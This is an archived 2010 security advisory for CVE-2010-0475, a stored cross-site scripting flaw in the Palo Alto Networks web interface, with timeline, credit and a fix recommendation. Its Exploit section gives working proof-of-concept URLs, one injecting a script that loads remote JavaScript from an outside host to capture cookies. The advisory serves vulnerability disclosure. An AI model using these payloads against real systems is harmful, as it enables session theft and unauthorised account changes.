AOH :: HP Unsorted P :: B1A-1012.HTM

Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)



Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)



Class: 		Cross-Site Scripting (XSS) Vulnerability=0D
CVE: 	CVE-2010-0475=0D
Remote: Yes =0D
Local: 	Yes =0D
Published: May 11, 2010 08:30AM=0D
Timeline:Submission to MITRE: 1/18/2010=0D
Vendor Contact: 2/18/2010=0D
Vendor Response:  2/18/2010=0D
Patch Available:  5/2010  Patched in maintenance releases (3.1.1 & 3.0.9)=0D
Credit: Jeromie Jackson CISSP, CISM=0D
	COBIT & ITIL Certified=0D
	President- San Diego Open Web Application Security Project (OWASP)=0D
	Vice President- San Diego Information Audit & Control Association (ISACA)=0D
	SANS Mentor=0D
LinkedIn: www.linkedin.com/in/securityassessment=0D 
Blog: www.JeromieJackson.com=0D 
Twitter: www.twitter.com/Security_Sifu=0D 
 =0D
Validated Vulnerable: 	=0D
   Latest Version Per December 31, 2009=0D
=0D
Discussion: =0D
=0D
A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface.  By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.  =0D
=0D
=0D
Exploit: =0D
Single Line working-  https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin=0D
=0D
&admin-role=%5Bobject+Object%5D&bSubmit=O=0D
=0D
=0D
=0D
WORKING FOR REDIRECT TO LOAD cookies into URL.=0D
=0D
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O=0D">SRC="http://www.jeromiejackson.com/tryme.js">&admin-role=%5Bobject+Object%5D&bSubmit=O=0D 
=0D
=0D
Solution: =0D
A patch will be required from the vendor.  It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application. =0D
=0D
References:=0D
OWASP Cross-Site Scripting (XSS) Attack Discussion=0D
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.